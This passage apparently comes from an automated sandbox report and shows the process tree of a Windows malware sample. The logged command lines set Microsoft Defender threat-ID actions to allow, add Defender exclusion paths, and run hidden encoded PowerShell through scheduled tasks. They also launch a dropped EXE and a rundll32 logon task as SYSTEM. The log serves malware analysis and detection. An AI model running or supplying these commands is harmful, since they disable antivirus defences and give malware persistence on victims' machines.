powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2188

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3592

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3084

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3064

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1680

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2052

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:1592

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:1684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:1948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:3592

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:2980

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:2000

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:4080

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:2828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:1680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:2848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:4016

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:1208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ELOJFuMDhuHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WSPNEpLqQIE\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\anjFGKdzU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fcsvEsvhbcUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\pQmgloyPupxgC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pDJsDjHXtdwyYAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\rUaCEWwDdnKMYjxw\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4088

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ELOJFuMDhuHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4048

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3184

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WSPNEpLqQIE" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3004

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1872

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XcjIDTjqJhZdTpTIqBR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1144

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\anjFGKdzU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2268

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2360

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fcsvEsvhbcUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1116

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\pQmgloyPupxgC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3168

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3188

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pDJsDjHXtdwyYAVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:656

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:32
3⤵
PID:848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\LocalLow\jeZaYrHiEGvsn /t REG_DWORD /d 0 /reg:64
3⤵
PID:1200

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:32
3⤵
PID:1928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HIvtarFlYqBBYrrFi /t REG_DWORD /d 0 /reg:64
3⤵
PID:2884

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:32
3⤵
PID:2848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\rUaCEWwDdnKMYjxw /t REG_DWORD /d 0 /reg:64
3⤵
PID:3064

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gBTFKAtsN" /SC once /ST 02:09:54 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Creates scheduled task(s)
PID:1208

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gBTFKAtsN"
2⤵
PID:2312

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gBTFKAtsN"
2⤵
PID:3188

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "jrzNdZzegeVMzeqYf" /SC once /ST 03:48:44 /RU "SYSTEM" /TR "\"C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\HrhavpK.exe\" gh /site_id 767 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1920

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "jrzNdZzegeVMzeqYf"
2⤵
PID:1928

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:3748

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:1872

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:2360

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4080

C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\HrhavpK.exe
C:\Windows\Temp\rUaCEWwDdnKMYjxw\EDawfRbJCwSQAxV\HrhavpK.exe gh /site_id 767 /S
1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4016

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" &
2⤵
PID:1328

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1576

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:2112

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2056

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:3592

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:3728

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:816

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1852

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
3⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
4⤵
PID:1340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2976

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
6⤵
PID:1928

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "bqZkKdgiyjBiVwZYfn"
2⤵
PID:648

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
2⤵
PID:3764

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
3⤵
PID:3860

C:\Windows\SysWOW64\cmd.exe
cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
2⤵
PID:3844

C:\Windows\SysWOW64\reg.exe
REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
3⤵
PID:1568

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\anjFGKdzU\VYfjPS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JRajWlGIFNTafba" /V1 /F
2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3780

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "JRajWlGIFNTafba2" /F /xml "C:\Program Files (x86)\anjFGKdzU\gMqHwmC.xml" /RU "SYSTEM"
2⤵
- Creates scheduled task(s)
PID:3232

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "JRajWlGIFNTafba"
2⤵
PID:2268

C:\Windows\SysWOW64\schtasks.exe
